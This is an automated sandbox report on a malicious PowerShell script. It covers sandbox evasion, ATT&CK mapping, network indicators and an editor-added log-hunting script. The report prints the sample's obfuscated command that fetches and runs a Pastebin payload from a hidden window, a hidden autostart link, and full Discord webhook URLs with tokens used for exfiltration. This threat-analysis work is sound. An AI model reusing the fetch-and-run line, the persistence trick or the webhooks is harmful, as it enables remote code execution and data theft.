Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5361
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1454
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1026
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4590
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3324 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep count: 1454 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628 | Thread sleep count: 141 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464 | Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684 | Thread sleep count: 4086 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1756 | Thread sleep count: 5618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1152 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396 | Thread sleep count: 1026 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736 | Thread sleep count: 510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 | Thread sleep count: 175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980 | Thread sleep count: 5136 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700 | Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980 | Thread sleep count: 4590 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000000.00000002.1654089475.000001F77E3A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW)Q
Source: powershell.exe, 00000007.00000002.1873629350.000001D4FB25A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: powershell.exe, 0000000C.00000002.1941161276.00000201B4960000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1653152889.000001F77E318000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic, six matrix cells each; a numeric prefix is the report's hit marker for that technique, kept exactly as displayed, and unnumbered entries are the matrix's standard technique names with no hits)

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
• Execution: 111 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task
• Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
• Privilege Escalation: 11 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
• Defense Evasion: 1 Masquerading; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
• Discovery: 111 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
• Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
• Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1534226 | Sample: cr_asm_atCAD.ps1 | Start date: 15/10/2024 | Architecture: WINDOWS | Score: 84

Hosts contacted: pastebin.com, raw.githubusercontent.com, discord.com
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Suspicious PowerShell Parameter Substring; AI detected suspicious sample; Connects to a pastebin service (likely for C&C) [pastebin.com]

Process tree (as drawn in the graph):
• powershell.exe
  - network: discord.com 162.159.136.232, port 443 (source ports 49710, 49717), CLOUDFLARENETUS, United States
  - dropped: C:\ProgramData\...\BeginSync.lnk (MS)
  - signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Tries to open files direct via NTFS file id; Powershell creates an autostart link
  - started: conhost.exe; attrib.exe
• forfiles.exe
  - started: powershell.exe (signature: Suspicious powershell command line found); conhost.exe
  - that powershell.exe started a further powershell.exe with network: raw.githubusercontent.com 185.199.110.133, port 443 (source ports 49706, 49708), FASTLYUS, Netherlands; pastebin.com 104.20.3.235, port 443 (source ports 49704, 49705), CLOUDFLARENETUS, United States
• forfiles.exe
  - started: powershell.exe, which started a further powershell.exe; conhost.exe
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| cr_asm_atCAD.ps1 | 3% | ReversingLabs | | |

No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
| http://crl.microsoft | 0% | URL Reputation | safe | |
| https://go.micro | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
| https://aka.ms/pscore68 | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://crl.v | 0% | URL Reputation | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| discord.com | 162.159.136.232 | true | true | | unknown |
| raw.githubusercontent.com | 185.199.110.133 | true | true | | unknown |
| pastebin.com | 104.20.3.235 | true | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 | true | | unknown |
| http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown |
| https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | true | | unknown |
| https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 | true | | unknown |
| http://pastebin.com/raw/sA04Mwk2 | false | | unknown |
| https://pastebin.com/raw/sA04Mwk2 | false | | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM | powershell.exe, 00000007.00000002.1800661112.000001D481725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://discord.com | powershell.exe, 00000000.00000002.1618712133.000001F701D2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown |
| http://crl.microsoft | powershell.exe, 00000007.00000002.1872751109.000001D4FB130000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://go.micro | powershell.exe, 00000000.00000002.1618712133.000001F7017B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown |
| https://discord.com/api/webhooks/129575196622756 | powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://contoso.com/License | powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://raw.githubusercont | powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| http://www.microsoft.cox | powershell.exe, 00000000.00000002.1652936620.000001F77E120000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://discord.com/ | powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| http://discord.com | powershell.exe, 00000000.00000002.1618712133.000001F701E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://pastebin.com/raw/sA04Mwk2mand | powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://0.discor | powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://raw.githubusercontent.com | powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv | powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmp | true | | unknown |
| https://contoso.com/ | powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8J | powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, cr_asm_atCAD.ps1 | true | | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://raw.githubusercontent.com | powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D273000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://raw.githubusconte | powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C791000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://0.discord.com/ | powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| http://crl.v | powershell.exe, 0000000C.00000002.1869396878.000002019C5D4000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://pastebin.com | powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48133C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1F4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://pastebin.com | powershell.exe, 00000007.00000002.1800661112.000001D48038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1E4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true |
| 162.159.136.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true |
| 185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true |
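The domain, URL and IP tables above describe the whole staging and exfiltration chain of this sample: a Pastebin raw paste and a raw.githubusercontent.com file are fetched by a child powershell.exe, and the collected data goes out through Discord webhooks. The script below is an added example by the editor, not part of the Joe Sandbox report or of the sample, that turns those indicators into a proxy-log hunt. It generalises the three URL shapes into regular expressions (webhook IDs and tokens change per campaign, so the exact URLs above are not the signal) and raises an alert only when the same client fetches staging content and then calls a webhook within a short window. The log line format, the window of 300 seconds and the sample lines are constructed for the example; the webhook IDs in the sample lines are the two from the report and the tokens are replaced by a placeholder.

```powershell
# Added example (not from the report or the sample): hunt proxy logs for the
# staging -> Discord-webhook chain seen in this analysis.

# Regexes generalising the report's URLs (assumed shapes; IDs/tokens vary per campaign).
$iocPatterns = [ordered]@{
    'pastebin-raw'    = 'https?://pastebin\.com/raw/\w+'
    'github-raw'      = 'https?://raw\.githubusercontent\.com/[^\s"]+'
    'discord-webhook' = 'https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+'
}

function Find-StagingChain {
    # Assumed log line shape: "<ISO8601 time> <client ip> <method> <url> <status>".
    # Returns every IOC hit plus an alert per client that fetched staging content
    # and then posted to a webhook within $WindowSeconds.
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [int]$WindowSeconds = 300
    )

    $hits = foreach ($line in $Lines) {
        $f = $line -split '\s+', 5
        if ($f.Count -lt 4) { continue }
        foreach ($name in $iocPatterns.Keys) {
            if ($f[3] -match $iocPatterns[$name]) {
                [pscustomobject]@{
                    Time   = [datetime]::Parse($f[0], [cultureinfo]::InvariantCulture)
                    Client = $f[1]
                    Method = $f[2]
                    Ioc    = $name
                    Url    = $Matches[0]
                }
            }
        }
    }

    $alerts = foreach ($grp in ($hits | Group-Object Client)) {
        $staging  = @($grp.Group | Where-Object Ioc -in 'pastebin-raw', 'github-raw')
        $webhooks = @($grp.Group | Where-Object Ioc -eq 'discord-webhook')
        foreach ($w in $webhooks) {
            # Staging must precede the webhook call, and not by more than the window.
            $prior = @($staging | Where-Object {
                $_.Time -le $w.Time -and ($w.Time - $_.Time).TotalSeconds -le $WindowSeconds
            })
            if ($prior.Count -gt 0) {
                [pscustomobject]@{
                    Client   = $grp.Name
                    Staging  = ($prior.Url -join ', ')
                    Webhook  = $w.Url
                    Severity = 'high'
                }
            }
        }
    }

    [pscustomobject]@{ Hits = @($hits); Alerts = @($alerts) }
}

# Constructed sample log (not real traffic). Webhook IDs are the two from the
# report; the tokens are replaced by a placeholder.
$sampleLog = @(
    '2024-10-15T15:58:04Z 10.0.0.5 GET https://pastebin.com/raw/sA04Mwk2 200'
    '2024-10-15T15:58:06Z 10.0.0.5 GET https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt 200'
    '2024-10-15T15:58:09Z 10.0.0.5 POST https://discord.com/api/webhooks/1295751633158013021/PLACEHOLDER_TOKEN 204'
    '2024-10-15T15:59:30Z 10.0.0.9 GET https://pastebin.com/ 200'
    '2024-10-15T16:40:00Z 10.0.0.7 POST https://discord.com/api/webhooks/1295751966227566694/PLACEHOLDER_TOKEN 204'
    '2024-10-15T16:41:00Z 10.0.0.7 GET https://pastebin.com/raw/sA04Mwk2 200'
)

$result = Find-StagingChain -Lines $sampleLog
$result.Hits   | Format-Table Time, Client, Ioc, Url
$result.Alerts | Format-Table
```

The last two constructed lines are deliberately in the wrong order (webhook first, staging afterwards) so that the ordering and window check, not the mere presence of an IOC, is what drives the alert. Against real proxy data, adjust the `-split` to the actual field layout and feed the lines through `Get-Content`.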
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1534226
                                                          Start date and time:2024-10-15 17:57:01 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 23s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:cr_asm_atCAD.ps1
                                                          Detection:MAL
                                                          Classification:mal84.troj.evad.winPS1@16/15@4/3
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 61%
                                                          • Number of executed functions: 21
